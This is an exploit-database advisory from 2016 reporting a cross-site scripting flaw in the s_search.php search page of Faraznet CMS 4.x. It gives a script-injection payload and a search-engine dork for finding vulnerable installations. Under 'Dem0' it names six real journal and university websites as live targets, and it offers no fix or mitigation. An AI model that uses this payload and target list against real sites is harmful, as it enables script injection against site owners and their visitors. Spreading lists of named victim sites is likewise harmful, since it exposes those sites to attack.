Cross-Site Scripting in Faraznet Cms Version 4.x ########################### # Faraznet Cms Cross-Site Scripting Vulnerability ########################### ##################################### # Iranian Exploit DataBase And Security Team - iedb.ir # Title : Faraznet Cms Cross-Site Scripting Vulnerability # Vulnerability : Cross-Site Scripting (xss) # Vulnerability on : s_search.php # Version : 4.x # Dork : "Designed By Faraznet" # Vendor site : http://www.faraznet.net # Author : IeDb.Ir # Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir # Vulnerability attack information site : http://xssed.Ir Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ Email : iedb.team@xxxxxxxxx # Archive Exploit : http://iedb.ir/exploits-6119.html ##################################### # Bug : http://www.site.com/en/s_search.php Post Script : '"<script>alert(/Iedb.Ir/)</script> # Dem0 [ Xss ] http://ijssh.com/en/s_search.php http://www.intjournalssm.com/en/s_search.php http://www.sjsmjournal.com/en/s_search.php http://www.irjabs.com/en/s_search.php http://geo-tech.iauzah.ac.ir/en/s_search.php http://www.nafasjournal.ir/en/s_search.php ##################################### Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir ##################################### # Archive Exploit = http://iedb.ir/exploits-6119.html ##################################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07] ###########################